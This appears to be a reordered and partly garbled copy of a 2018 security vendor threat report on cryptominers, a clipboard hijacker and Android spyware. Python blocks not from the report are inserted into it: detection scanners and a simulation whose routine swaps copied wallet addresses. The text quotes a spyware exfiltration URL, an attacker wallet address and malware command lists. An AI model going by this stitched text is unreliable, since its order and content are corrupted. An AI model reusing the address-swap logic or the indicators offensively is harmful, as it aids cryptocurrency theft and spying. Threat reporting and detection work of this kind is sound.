Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility”.
7.10 Finland, Russia, USA
Finally, let’s have a look at Comodo’s virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki’s suburb of Vantaa – precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world, but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, sophisticated in persistence, and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the acceleration of cybercriminals’ bias to hunt for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies, and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL’s mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world’s largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world’s largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
2.4 The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors to covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.
Trojans let attackers gain time. As malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases, attacks can only be discovered too late, after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery, observed during Q2, will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures per the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.
Chart: The growth of Flawed Ammyy attacks for Q2 (data labels 43188, 46382, 48881; x-axis Apr, May, Jun; y-axis 40000 to 50000).
3 Cryptominer Evolution
Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean that their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers, and even crash user systems if met with an attempt to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware represents malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim’s computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. In the screenshots below you see exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
BadShell at work
The malicious code in the registry
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise’s computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer’s ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner: a system killer
Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature – it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.
The secret of WinstarNssmMiner’s persistence lies in its method of infecting a victim’s computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task – mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute “CriticalProcess”, meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims’ systems but also their cryptomining competitors.
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner gets the victim's computer to itself and uses all of its resources for mining cryptocurrency.
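The two behaviours just described, a pair of rogue svchost.exe hosts (3.2) and a miner that looks for an AMDDriver64 process before deciding what to kill (3.3), both show up in a plain process inventory. The following is an added example, not code from the Comodo report: it triages a hand-constructed inventory (process names, parents, image paths and command lines are made up to mirror the two patterns) and only reports. It deliberately never terminates anything, because a process carrying the critical flag takes the machine down with it. On a live host you would build the inventory from Sysmon event 1, Get-CimInstance Win32_Process or an EDR export.

```python
"""Triage a Windows process inventory for rogue svchost.exe hosts and known
miner process names. Added example; the inventory below is constructed."""
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    image_path: str
    cmdline: str


GENUINE_SVCHOST = r"c:\windows\system32\svchost.exe"

# Process names used by miners. "AMDDriver64" is the one named in the report;
# CoinMiner's $malwares / $malwares2 kill lists are not reproduced on the page,
# so extend this set from your own intelligence.
KNOWN_MINER_NAMES = {"amddriver64"}

# Constructed sample inventory (not real telemetry).
SAMPLE_PROCS: List[Proc] = [
    Proc(4, 0, "System", "", ""),
    Proc(620, 4, "wininit.exe", r"C:\Windows\System32\wininit.exe", "wininit.exe"),
    Proc(700, 620, "services.exe", r"C:\Windows\System32\services.exe",
         r"C:\Windows\System32\services.exe"),
    Proc(2980, 2900, "explorer.exe", r"C:\Windows\explorer.exe", "explorer.exe"),
    # genuine service host: child of services.exe, System32 image, -k group
    Proc(812, 700, "svchost.exe", r"C:\Windows\System32\svchost.exe",
         r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
    # rogue copy dropped in a world-writable directory, started from explorer
    Proc(3120, 2980, "svchost.exe", r"C:\Users\Public\svchost.exe",
         r"C:\Users\Public\svchost.exe"),
    # genuine image but spawned by the rogue copy with no service group:
    # the shape of an injected or hollowed host
    Proc(3188, 3120, "svchost.exe", r"C:\Windows\System32\svchost.exe",
         r"C:\Windows\System32\svchost.exe"),
    # CoinMiner's presence indicator (pool address is made up)
    Proc(4100, 2980, "AMDDriver64.exe", r"C:\ProgramData\AMDDriver64.exe",
         r"C:\ProgramData\AMDDriver64.exe -o stratum+tcp://pool.example:3333"),
]


def stem(name: str) -> str:
    """'AMDDriver64.exe' -> 'amddriver64'."""
    n = name.lower()
    return n[:-4] if n.endswith(".exe") else n


def triage(procs: List[Proc]) -> List[Dict]:
    """Return one finding per suspicious process, in inventory order.
    Rules for svchost.exe are the invariants the genuine service host always
    obeys: parent is services.exe, image lives in System32, and it is started
    with a -k service group."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        reasons = []
        if p.name.lower() == "svchost.exe":
            parent = by_pid.get(p.ppid)
            if parent is None or parent.name.lower() != "services.exe":
                reasons.append("parent is not services.exe")
            if p.image_path.lower() != GENUINE_SVCHOST:
                reasons.append("image is not System32\\svchost.exe")
            if " -k " not in p.cmdline.lower():
                reasons.append("no -k service group on the command line")
        if stem(p.name) in KNOWN_MINER_NAMES:
            reasons.append("name matches a known miner process")
        if reasons:
            findings.append({"pid": p.pid, "name": p.name, "reasons": reasons})
    return findings


if __name__ == "__main__":
    # Report only. Check ProcessBreakOnTermination before any kill decision.
    for f in triage(SAMPLE_PROCS):
        print(f["pid"], f["name"], "; ".join(f["reasons"]))
```

The three findings on the sample are the two svchost.exe impostors and the AMDDriver64 process; the genuine host with a -k group under services.exe is left alone.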
Some cryptominers drew the spotlight of the mass media and cybersecurity researchers, which made them easier for users to spot. In Q2 these cryptominers learned to hide, and CoinHive is the clearest example.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its snippet of code into your web page, every visitor to the site mines coins for you.
As you can see, the CoinHive script is easily spotted.
The CoinHive script
After many publications on the subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter perpetrators found a way around this obstacle: they now use a sneaky trick to camouflage CoinHive's presence with URL shorteners.
As a result, the malicious code on a web page looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe:
The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make it as invisible as possible.
Now let's look at the URL https://cnhv.co
And there we find the familiar link to CoinHive:
The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the web page code but finds no sign of a cryptominer. So she concludes that something is wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
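The check the user in that scenario needed is a scanner that decodes what the page hides before looking for the miner. Below is an added example, not code from the Comodo report: it walks every long base64 run in a page, decodes it, and reports any iframe that is 1x1 or that points at a known miner shortener. The sample page is constructed for the demonstration; cnhv.co is the shortener domain named in the report, the short-link path is made up, and the document.write(atob(...)) wrapper is an assumption about how the string is used (the scanner does not depend on it).

```python
"""Find base64-wrapped 1x1 iframes that load a miner through a URL shortener.
Added example; the sample page and short-link path are constructed."""
import base64
import binascii
import re
from html.parser import HTMLParser
from typing import Dict, Iterator, List
from urllib.parse import urlparse

# Shortener domains known to front miner scripts (cnhv.co is from the report).
MINER_SHORTENERS = {"cnhv.co"}

# Long runs of base64 alphabet; short identifiers are skipped.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in a document."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def layers(html: str) -> Iterator[str]:
    """Yield the page itself, then every base64 blob in it that decodes to text."""
    yield html
    for m in B64_RE.finditer(html):
        try:
            yield base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue


def is_tiny(value: str) -> bool:
    """True for width/height values of 1 or less ('1', '0', '1px')."""
    try:
        return int(value.strip().rstrip("px").strip()) <= 1
    except ValueError:
        return False


def find_hidden_miner_frames(html: str) -> List[Dict]:
    """Report iframes that are invisible or that load a known miner shortener,
    whether they sit in the page or inside a base64-encoded string."""
    findings = []
    for depth, text in enumerate(layers(html)):
        collector = IframeCollector()
        collector.feed(text)
        for frame in collector.iframes:
            src = frame.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            hidden = is_tiny(frame.get("width", "")) and is_tiny(frame.get("height", ""))
            known = host in MINER_SHORTENERS
            # A 1x1 frame is worth a look on its own; a known shortener is a hit.
            if known or hidden:
                findings.append({"src": src, "hidden": hidden,
                                 "known_miner_shortener": known,
                                 "base64_wrapped": depth > 0})
    return findings


# Constructed sample page. The inner iframe has the shape shown in the report.
HIDDEN_FRAME = ('<iframe src="https://cnhv.co/abc12" width="1" height="1" '
                'style="border:0"></iframe>')
SAMPLE_PAGE = (
    "<html><body><h1>Free wallpapers</h1>"
    '<script>document.write(atob("'
    + base64.b64encode(HIDDEN_FRAME.encode()).decode()
    + '"));</script></body></html>'
)

if __name__ == "__main__":
    for f in find_hidden_miner_frames(SAMPLE_PAGE):
        print(f)
```

A plain text search of the sample page for "coinhive" or for an iframe finds nothing; only the decoded layer exposes the 1x1 frame and the shortener. A browser extension or a proxy doing the same decode step is what closes the gap for the user in the scenario.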
The next malware in our list prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead steals cryptocurrency outright by redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or to type in by hand. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a gap they can exploit.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into the cybercriminals' hands.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed bundled with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The trojanized version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack:
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
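The swap above is easy to reproduce, and reproducing it shows why the usual "is this a valid address?" check is useless here. The following is an added example, not code from the Comodo report: a fake in-memory clipboard (so it runs anywhere), a hijacker loop that swaps any copied wallet address for the attacker's, a Base58Check validator, and the one check that actually works, comparing what is about to be pasted with what the user copied. The two Bitcoin addresses are the ones quoted in the report; the Ethereum pattern and the genesis-block address used in the self-check are additions.

```python
"""Clipboard hijack simulation and the paste-time check that defeats it.
Added example; the clipboard is a fake and the scenario is constructed."""
import hashlib
import re
from typing import Dict, Optional

VICTIM_ADDR = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"    # quoted in the report
ATTACKER_ADDR = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"  # quoted in the report

# Address shapes a hijacker watches for (legacy/P2SH Bitcoin and Ethereum).
WALLET_PATTERNS = {
    "btc": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def wallet_kind(text: str) -> Optional[str]:
    """Return 'btc', 'eth' or None for the clipboard text."""
    for kind, pattern in WALLET_PATTERNS.items():
        if pattern.match(text.strip()):
            return kind
    return None


def b58check_valid(addr: str) -> bool:
    """True if addr is well-formed Base58Check: 1 version byte + 20-byte hash
    + 4-byte checksum, where checksum = first 4 bytes of SHA256(SHA256(body)).
    Note that the attacker's address passes this just as the victim's does."""
    n = 0
    for ch in addr:
        if ch not in B58_ALPHABET:
            return False
        n = n * 58 + B58_ALPHABET.index(ch)
    try:
        raw = n.to_bytes(25, "big")
    except OverflowError:
        return False
    body, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(body).digest()).digest()[:4] == checksum


class FakeClipboard:
    """Stand-in for the system clipboard."""

    def __init__(self) -> None:
        self.text = ""

    def copy(self, text: str) -> None:
        self.text = text

    def paste(self) -> str:
        return self.text


def hijacker_tick(clip: FakeClipboard, attacker_addrs: Dict[str, str]) -> bool:
    """One poll of the malware loop: swap a copied wallet address for the
    attacker's address of the same kind. Returns True if a swap happened."""
    current = clip.paste()
    kind = wallet_kind(current)
    target = attacker_addrs.get(kind) if kind else None
    if target and current != target:
        clip.copy(target)
        return True
    return False


def fingerprint(addr: str) -> str:
    """What a careful user notes from the source: first and last four chars."""
    return addr[:4] + "..." + addr[-4:]


def paste_matches(fp: str, text: str) -> bool:
    """Paste-time check: does the clipboard still match the noted fingerprint?"""
    return fingerprint(text) == fp


def demo() -> Dict[str, object]:
    """Run the scenario from the report against the fake clipboard."""
    clip = FakeClipboard()
    noted = fingerprint(VICTIM_ADDR)      # user reads the address from the invoice
    clip.copy(VICTIM_ADDR)                # Ctrl+C
    swapped = hijacker_tick(clip, {"btc": ATTACKER_ADDR})
    pasted = clip.paste()                 # Ctrl+V
    return {"swapped": swapped, "pasted": pasted,
            "detected": not paste_matches(noted, pasted)}


if __name__ == "__main__":
    print(demo())
```

The fingerprint check is the same advice given to users in prose, compare the first and last characters of the pasted address with the source, and it is the only check that depends on something the malware cannot know: what the user intended to paste.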
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in number, they keep coming back in updated disguises and promise to become a serious new challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, stealing, mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising: today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Every smartphone now contains a wealth of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, cybercriminals are not the only ones hunting for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and it is easy to understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, posing as innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It is distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details (contact ID, name, phone numbers and email address of the owner). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email type) and the photos of contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server at http://cgalim.com/admin/hr/pu/pu.php?do=upload
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via the official Google Play store. The spyware was camouflaged as a chat application called Dardesh Instant App, but when a user downloaded and ran it, the app covertly connected to the cybercriminals' command-and-control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Social networks were another means of disseminating the malware.
Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools such as FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has four different versions:
Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
Version-3: Celebs Gone Wild, جریدة النھار الکویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call-log details and external storage content.
The third version is included in the spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the command-and-control server
Upload image files
Collect information about installed applications
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications such as VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some extra tricks:
Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend it delivers a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message DB and the related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with a purposeful hunt for banking applications on the device. It uses trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
After infection Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contact details
Set Wi-Fi to always on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in our list is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.
App / Distribution
FlexiSpy: MBackup
HelloSpy: ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service
Mobile Spy: 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and Mobile Spy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of LokiBot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a "007 licence".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on a device:
Send_SMS: extract SMS content and send it to the C&C server
Send_USSD: send the USSD to the C&C server
Gethistory: monitor browser history
Start_AllApp: gather info about installed applications
Send_call: set the Intent action to call
Forward_call: forward incoming calls
ResForward_call: reset call forwarding
Go_Smsmnd: delete SMS content
Go_GetAlls: get SMS history
Dell_sms: delete SMS content in a conversation
Send_spam: send spam SMS
Start_Inject: call the injector class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot.
佐川急便, 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp
Here are some commands from its command-and-control server:
contacts: get contact details and email ID
Mute: set action to mute
Mms: get MMS content
info: get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It scans the device for the following banking applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can also block access to several services, including Google Chrome, the Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly operates in Iran. It uses third-party app stores, social networks and messengers for spreading.
Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام, ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled through Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy. It comes to victims in the variety of disguises named below.
Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option. If the user taps this button, the malware begins working in the background, subscribing the user to services she never ordered.
4.1.11 CoinHive
The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.
Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via … another cryptominer, named CoinMiner.
How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for the purpose, downloads it and implants it into the victims' machines. However, she is not aware that another cybercriminal had earlier infected CoinMiner with CoinHive. So the first attacker is a victim too: a thief robbing a thief.
This story clearly illustrates the state of cybersecurity in Q2: no one can feel totally secure. Even a predator can turn into prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April (chart)
4.2.2 May 2018
Android-targeted malware in May (chart)
4.2.3 June 2018
Android-targeted malware in June (chart)
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and to understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
